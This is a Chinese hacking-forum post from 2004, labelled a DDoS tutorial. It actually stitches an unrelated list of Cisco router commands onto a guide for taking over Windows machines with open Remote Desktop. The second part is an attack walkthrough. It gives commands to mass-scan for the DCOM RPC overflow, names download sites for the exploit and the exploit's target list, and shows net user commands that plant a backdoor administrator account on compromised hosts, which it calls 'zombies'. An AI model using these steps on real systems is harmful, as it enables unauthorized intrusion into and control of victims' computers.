论坛: 菜鸟乐园 标题: DDOS教程~~~转载 复制本贴地址    
作者: spy-abba [spyabba]    论坛用户   登录
  转载~          [URL=http://www.51cnet.com/imagesz/list.asp?id=419 ]http://www.51cnet.com/imagesz/list.asp?id=419 [/URL]  进这个网站看吧
CISCO基本命令集 快速获得3389肉机
一、 基本路由器的检验命令
show version
show processes
show protocols
show mem
show ip route
show startup-config
show running-config
show flash
show interfaces
二、 基本路由配置命令
进入:config terminal/memory/network
配置网络时常采用的命令:copy和load
1. 标识:hostname 标识名
2. 启动标识:banner 启动标识
3. 接口:interface 端口号
4. 密码:line 0 6
login
passwd 口令
enable password/secret 口令
5. 接口:
1)配置端口
interface 端口号
clock rate 时钟速率(64000)/* 在串口中配置 */
bandwidth 带宽(缺省56) /* 在串口中配置 */
media-type 介质类型 /* 在以太网口上 */
early-token release /* 在令牌环网口上 */
ring-speed 16 /* 在令牌环网口上 */
no shutdown
write memory
2)检验端口
show interfaces
show controllers
6. 配置环境
1) 引导方式
boot system flash IOS-filename
boot system tftp IOS-filename tftp-address
boot system rom
2) 配置Register值
config-register 0x2102
7. 查看邻居路由
show cdp interface
show cdp neighbors [detail]
show cdp entry routerA
8. IP Address 配置
Ip address 网络地址 掩码
Ip host 主机名 address
Ip name-server 服务器地址1 服务器地址2 。。。
Ip domain-lookup nsap
Show hosts
Ping 主机名/IP地址
Trace 主机名/IP地址
三、 IP 路由
1. 静态路由
ip routing
ip route 目标网络号 掩码 端口号 [permanent]
2. 缺省路由
ip default-network 网络号
3. 动态路由
1) RIP配置
Router rip
Network 网络号
Show ip route
Show ip protocol
Debug ip
2) OSPF 配置
Router ospf 进程号
Redistribute 其它路由协议
Network 端口网络 反掩码 area 区域号
Area 区域号 range 网络号 掩码
Area 区域号 default-cost 花销值
Ip ospf priority number
Ip ospf cost 花销值
Show ip ospf database
3) BGP 配置
Router bgp 自治域号
Redistribute 其它路由协议
Network 网络号 /* 自治域内 */
Aggregate-address 网络号 掩码 summary-only 汇总网络
Neighbor 相邻网络号 remote-as 自治域号 /* 自治域间的网络 */
四、 流量控制
1) 被动端口
passive interface 端口号
2) 缺省路由
ip default 网络号/端口网络
3) 静态路由
ip route 目标网络号 掩码 端口号
4)ACL过滤表
(全局上) access-list 访问号1 {permit|deny} 反掩码号 [ established]
access-list 访问号2 {permit|deny} IP/TCP协议 源网络 目的网络
操作符 参数
(端口上)access-group 访问号 in|out
distribute-list 访问号 in|out 端口号
4) Null 0 interface
Ip route address mask null 0
五、 广义网配置
1) PPP
Ppp pap sent-usename 封装
Ppp chap hostname
Ppp chap password
2)X.25
encapsulation x25 [dce]
x25 address
x25 map 协议地址 /*SVC */
x25 pvc pvc号 ip地址 x25地址 /*PVC */
ip switching
x25 route x.121地址 接口 x.121映射地址
2) FrameRelay
Frame-relay local-dlci IP网络号
Frame-relay map 协议地址
Frame-relay lmi-type ansi

                      快速获得3389肉机

  这是我第一次写技术文章,不当之处还请大家指正。
  记得从前看过一篇文章介绍如何快速获得3389肉机的文章,基本思路及步骤如下:先通过superscan等扫描端口的工具扫一段开启3389端口的主机,然后导出主机列表,再由x-scan扫描NT弱口令,配置强一点的字典,稍等一会儿,得到偌多弱口令,祭起终端连接,成功连接填入用户名就可以远程登陆控制了。留后门,删日志……
  其实得到开启3389服务的主机列表后,我们完全可以利用当前危害最大的“dcomrpc漏洞”添加一个管理员帐号,再用这个帐号轻松地登陆到远程终端,达到图形化的完全控制。
  用到的工具有:superscan、x-scanV2.3、还有一个新增的x-scan的插件DComRpc.xpn,专门用来扫描存在DComRpc漏洞的机器。可以到这里下载http://www.xfocus.net/tools/200307/DComRpc.xpn,把它放到x-scan下plugin目录下。x-scan便有了扫描DComRpc漏洞的功能。当然你也可以下载专用的扫描器。不过经本人测试,这个插件还是相当好用的。还有主角远程 DCOM RPC 缓冲区溢出工具点击这里下载http://81.heibai.net:81/download/show.php?id=3951。
  要开工了。用superscan得到主机列表,save成文本文件修改为一行一个IP的格式,这个过程略过不说了。打开加入了插件的x-scan,扫描参数中选“从文件获取主机列表”,选取刚才保存的文件。在扫描模块中只选择最后一项,也就是刚加进去的插件,Dcomrpc溢出漏洞。开始扫描吧,你会发现几乎是所有的机器都存在这个好玩而简单的漏洞。现在该用xpdcomrpc了,先看一下帮助吧:
---------------------------------------------------------
- 远程 DCOM RPC 缓冲区溢出
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- EXE 文件编译及修改:sagi http://www.hackerxfiles.net  
- Usage: xp <Target ID> <Target IP>
- Targets:
-    0 Windows 2000 SP0 (english)
-    1 Windows 2000 SP0 (english2)
-    2 Windows 2000 SP1 (english)
-    3 Windows 2000 SP2 (english)
-    4 Windows 2000 SP2 (english2)
-    5 Windows 2000 SP3 (english)
-    6 Windows 2000 SP3 (english2)
-    7 Windows 2000 SP3 (english3)
-    8 Windows 2000 SP4 (english)
-    9 Windows XP  SP0 (english)
-    10 Windows XP  SP1 (english)
-    11 Windows XP  SP1 (english2)
-    12 Windows XP  SP2 (english)
-    13 Windows 2000 SP3 (chinese)
-    14 Windows 2000 SP4 (chinese)
-    15 Windows XP  SP0 (chinese)
-    16 Windows XP  SP1 (chinese)
-    17 Windows 2000 SP0 (japanese)
-    18 Windows 2000 SP1 (japanese)
-    19 Windows 2000 SP2 (japanese)
-    20 Windows 2000 SP0-1  (big5)
-    21 Windows 2000 SP3  (big5)
-    22 Windows 2000 SP4  (big5)
-    23 Windows XP  SP0-1  (big5)
-    24 Windows 2000 SP0 (korean)
-    25 Windows 2000 SP1 (korean)
-    26 Windows 2000 SP2 (korean)
-    27 Windows 2000 SP4 (korean)
明白了吗?现在我们就可以这样了:
xp 13 192.168.1.*
一段提示过后,看到跳出的shell了吗?
c:\winnt\system32>
呵呵,到这一步,一切都好做了
c:\winnt\system32>net user admin hahaha /add
命令成功完成
c:\winnt\system32>net localgroup administrators admin /add
命令成功完成
好了,现在就可以用这个帐号admin进行3389远程控制了。
  这种方法比较简单吧,要比起破解nt弱口令要主动一些,在此也是提出一种思路吧。从一开始的输入法漏洞开始,3389注定不能平安,愿大家都找到自己好用的肉机吧~

http://www.51cnet.com/imagesz/list.asp?id=81 美国公认顶尖黑客榜


[此贴被 spy-abba(spyabba) 在 02月07日21时45分 编辑过]


[此贴被 spy-abba(spyabba) 在 02月07日21时51分 编辑过]

地主 发表时间: 04-02-07 21:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号